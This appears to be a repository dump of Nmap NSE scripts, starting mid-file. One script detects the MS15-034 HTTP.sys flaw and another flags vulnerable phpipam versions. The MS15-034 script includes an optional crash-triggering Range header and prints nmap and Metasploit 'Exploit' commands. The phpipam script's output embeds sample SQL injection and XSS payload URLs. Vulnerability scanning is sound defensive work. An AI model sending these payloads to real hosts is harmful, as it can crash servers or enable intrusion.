59 | -- | http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on 60 | -- | HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2, 61 | -- | Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. 
62 | -- | Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit 63 | -- | Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd 64 | -- | 65 | -- | References: 66 | -- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635 67 | -- | https://technet.microsoft.com/en-us/library/security/ms15-034.aspx 68 | -- | http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd 69 | -- |_ 70 | -- @args ms15-034.uri - URI to use in request (the code reads SCRIPT_NAME..".uri"; the unprefixed 'uri=' form in the examples is accepted too) -> Default: / 71 | -- @args ms15-034.D0S - set to "exploit" to send the crash-triggering Range header instead of the harmless probe; destructive, it crashes the target host -> Default: unset (probe only) 72 | -- @args ms15-034.agent - User-agent to send in header request -> Default: iPhone,safari 73 | --- 74 | 75 | 76 | author = "DigitalStroopwafel, r00t-3xp10it" 77 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 78 | categories = {"vuln", "dos"} 79 | 80 | 81 | 82 | -- THE RULES SECTION -- 83 | -- portrule = shortport.http [replaced by an explicit port list. NOTE(review): the service argument below is the single string "http, https, ipp, vnc", which never equals a detected service name, so in practice only the four port numbers match; pass a table {"http", "https", "ipp", "vnc"} for the service match to work] 84 | portrule = shortport.port_or_service({80, 443, 631, 5800}, "http, https, ipp, vnc", "tcp", "open") 85 | -- local uri = "/" [updated to use script arguments (anotheruri)] 86 | local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/" 87 | 88 | 89 | -- THE ACTION SECTION -- 90 | action = function(host, port) 91 | -- Build the HTTP request headers (these are HTTP headers, not TCP packet fields) with a spoofed User-Agent 92 | local options = {header={}} --> manipulate 'header' request .. 93 | options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25" --> use iPhone,safari User-agent OR your own... 
94 | options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 95 | options['header']['Cache-Control'] = "no-store" --> ask caches/servers not to store this exchange (a request-side hint only; the server may ignore it) 96 | 97 | 98 | -- special thanks to 'sathisharthars' POC 'https://goo.gl/lVO1x3' 99 | -- Range "bytes=0-18446744073709551615" (upper bound overflows 64 bits) is the probe: a vulnerable HTTP.sys answers 416 to it; "bytes=18-18446744073709551615" is the crash trigger (the MS15-034 DoS) 100 | -- NOTE(review): with D0S=exploit the 'return' below runs BEFORE http.get() is reached, so the crash-triggering request is never sent and the "tango down" message is printed without any packet leaving; if the DoS is really intended (it crashes the target host) the return must come after the request 101 | local D0S = stdnse.get_script_args(SCRIPT_NAME..".D0S") 102 | if (D0S == "exploit") then 103 | options['header']['Range'] = "bytes=18-18446744073709551615" 104 | return "Executing Denial-Of-Service Condition...\nstatus : please ping target to comfirm tango down..." 105 | else 106 | options['header']['Range'] = "bytes=0-18446744073709551615" 107 | end 108 | 109 | 110 | -- get response from target website (NOTE(review): on a failed connection response.body is nil and string.match() below raises; guard with 'response.body or ""') 111 | local response = http.get(host, port, uri, options) 112 | local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)") 113 | 114 | -- display target response (script output) 115 | if ( title == "Requested Range Not Satisfiable" ) then 116 | return "http.sys its Vulnerable\n State: VULNERABLE\n IDs: CVE-2015-1635\n Response: "..response.status.." 
(exploitable)\n Disclosure date: 2015-06-17\n Author: DigitalStroopwafel(module)\n r00t-3xp10it(review)\n\n Description:\n http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on\n on HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,\n Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.\n Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit \n Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd\n\n References:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635\n https://technet.microsoft.com/en-us/library/security/ms15-034.aspx\n http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd\n\n" 117 | 118 | else 119 | 120 | return "http.sys not Vulnerable\n State: NOT VULNERABLE\n IDs: CVE-2015-1635\n Response: "..response.status.." (we need: 416)\n Disclosure date: 2015-06-17\n Author: DigitalStroopwafel(module)\n r00t-3xp10it(review)\n\n" 121 | 122 | end 123 | end 124 | -------------------------------------------------------------------------------- /phpipam.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE phpipam.nse - Version 1.6 3 | -- Copy script to: /usr/share/nmap/scripts/phpipam.nse 4 | -- Update NSE database: sudo nmap --script-updatedb 5 | -- executing: nmap --script-help phpipam.nse 6 | -- executing: nmap -sV -Pn -p 80 --open --script phpipam.nse 7 | -- executing: nmap -sV -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam.php 8 | -- executing: nmap -sV -Pn -p 80 --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 9 | --- 10 | 11 | 12 | -- SCRIPT BANNER DESCRIPTION -- 13 | description = [[ 14 | 15 | Module Author: r00t-3xp10it 16 | Vuln discover: Saeed reza 17 | NSE script to detect multiple vulnerabilitys in phpipam (1.2.1 & 1.1.010) versions 18 | of open-source web IP address management 
application (IPAM). by default phpipam.nse 19 | searches for phpipam.html on target webserver, If target respondes 200 OK then my 20 | script will verify the version installed and If the 2 condictions are true it will 21 | display a vulnerable output. 22 | 23 | 24 | Some Syntax examples: 25 | nmap --script-help phpipam.nse 26 | nmap -sV -Pn -p 80 --open --script phpipam.nse 27 | nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24 28 | nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args uri=/phpipam.php 29 | nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 30 | nmap -sV -T4 -iR 400 -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam/ -oN IPAMreport.log 31 | 32 | ]] 33 | 34 | --- 35 | -- @usage 36 | -- nmap --script-help phpipam.nse 37 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse 38 | -- nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24 39 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args uri=/phpipam.php 40 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 41 | -- nmap -sV -T4 -iR 400 -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam/ -oN IPAMreport.log 42 | -- @output 43 | -- PORT STATE SERVICE VERSION 44 | -- 80/tcp open http phpipam 1.2.1 45 | -- | phpipam: 46 | -- | STATUS: VULNERABLE 47 | -- | VERSION: 1.2.1 (likelly exploitable) 48 | -- | Disclosure date: 28 set 2016 49 | -- | Vuln discover: Saeed reza 50 | -- | Module Author: r00t-3xp10it 51 | -- | 52 | -- | Description: 53 | -- | phpipam is an open-source web IP address management application, its goal is to provide light 54 | -- | modern and useful IP address management. It is php-based application with MySQL database backend, 55 | -- | using jQuery libraries, ajax and some HTML5/CSS3 features. 
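-- | [SQLI GET] => http://[Site]/phpipam/?page=tools&section=changelog&subnetId=a&sPage=50'
-- | [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1>&action=edit
-- |
-- | References:
-- | Vendor: http://phpipam.net/
-- | Vuln Discover: http://0day.today/exploit/25375
-- | Vuln Discover: https://www.exploit-db.com/exploits/39171/
-- | Module Author: https://sourceforge.net/u/peterubuntu10/profile/
-- |_
-- @args phpipam.uri the path to request on the target webserver (the code reads
--       SCRIPT_NAME..".uri"; the unprefixed 'uri=' form used in the examples above
--       is accepted too). Default: /phpipam.html
-- @args phpipam.agent User-Agent header to send with the request. Default: an
--       iPhone/Safari string (DEFAULT_AGENT below)
---

author = "r00t-3xp10it"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"safe", "discovery", "vuln"}



-- DEPENDENCIES (lua nse libraries) --
local stdnse = require ('stdnse') --> required to use nse arguments
local shortport = require "shortport"
local string = require "string"
local table = require "table"
local http = require "http"



-- THE RULE SECTION --
-- Ports 80/443, or any open TCP port fingerprinted as http/https. The service list
-- must be a table: the earlier single string "http, https" never equals a detected
-- service name, so that form only ever matched on port number.
portrule = shortport.port_or_service({80, 443}, {"http", "https"}, "tcp", "open")
-- Path requested on the target; overridable with --script-args uri=...
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/phpipam.html"

-- Versions named by the referenced advisories. The check is an exact match on the
-- version taken from the page <title>, so any other string is reported as "wrong version".
local VULNERABLE_VERSIONS = { ["1.2.1"] = true, ["1.1.010"] = true }

-- User-Agent sent when no 'agent' argument is given (an HTTP header only; nothing
-- at the TCP level is altered).
local DEFAULT_AGENT = "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"

-- Labels for the non-200 replies the script names explicitly; any other code is
-- echoed as a bare "response code".
local STATUS_LABELS = {
  [404] = "NOT FOUND",
  [400] = "BAD REQUEST",
  [401] = "UNAUTHORIZED",
  [302] = "REDIRECTED",
}

-- Fixed text appended after the "Description:" line of a VULNERABLE verdict.
-- ("&section=" had been mangled to "§ion=" by HTML-entity decoding of "&sect;".)
local VULN_DETAILS = table.concat({
  " phpipam is an open-source web IP address management application, its goal is to provide light",
  " modern and useful IP address management. It is php-based application with MySQL database backend,",
  " using jQuery libraries, ajax and some HTML5/CSS3 features.",
  " [SQLI GET] => http://[Site]/phpipam/?page=tools&section=changelog&subnetId=a&sPage=50'",
  " [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1>&action=edit",
  "",
  " References:",
  " Vendor: http://phpipam.net/",
  " Vuln Discover: http://0day.today/exploit/25375",
  " Vuln Discover: https://www.exploit-db.com/exploits/39171/",
  " Module Author: https://sourceforge.net/u/peterubuntu10/profile/",
  "",
  "",
}, "\n")



-- THE ACTION SECTION --
-- Fetch 'uri' from host:port, read the phpipam version out of the page <title>,
-- and report VULNERABLE only for the exact versions in VULNERABLE_VERSIONS.
-- Returns the script output as a string. Unlike the earlier version it does not
-- raise when the request fails (nil status) or the page carries no phpipam title.
action = function(host, port)
  local options = { header = {} }
  options.header['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or DEFAULT_AGENT
  options.header['Accept-Language'] = "en-GB,en;q=0.8,sv"
  options.header['Cache-Control'] = "no-store" --> ask caches/servers not to store this exchange

  local response = http.get(host, port, uri, options)

  -- A failed connection/parse leaves response.status nil; concatenating it into
  -- the output (as the earlier code did) raised "attempt to concatenate a nil value".
  local status = response and response.status
  if status == nil then
    return "\n index: "..uri.."\n STATUS: no HTTP response from target\n module author: r00t-3xp10it\n\n"
  end

  if status == 200 then
    local body = response.body or ""
    local version = string.match(body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>phpipam ([^<]*)")

    if version == nil then
      -- 200 OK but no "phpipam <version>" title: not a phpipam page (or an
      -- unversioned title). Previously this path crashed on the nil concatenation.
      return "\n STATUS: NOT VULNERABLE\n index: "..uri..": 200 Found\n VERSION: unknown (no phpipam version in page title)\n Module Author: r00t-3xp10it\n\n"
    end

    if VULNERABLE_VERSIONS[version] then
      return "\n STATUS: VULNERABLE\n VERSION: "..version.." (likelly exploitable)\n Disclosure date: 28 set 2016\n Vuln discover: Saeed reza\n Module Author: r00t-3xp10it\n\n Description:\n"..VULN_DETAILS
    end

    return "\n STATUS: NOT VULNERABLE\n index: "..uri..": 200 Found\n VERSION: "..version.." (wrong version)\n Module Author: r00t-3xp10it\n\n"
  end

  -- Any other reply: name the common codes, otherwise just echo the number.
  local label = STATUS_LABELS[status] or "response code"
  return "\n index: "..uri.."\n STATUS: "..status.." "..label.."\n module author: r00t-3xp10it\n\n"
end
--------------------------------------------------------------------------------
/xeoon-itachitux.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/nmap-nse-modules/266c676c06a9169bbdce5e5e2148a4e01adc0712/xeoon-itachitux.png
--------------------------------------------------------------------------------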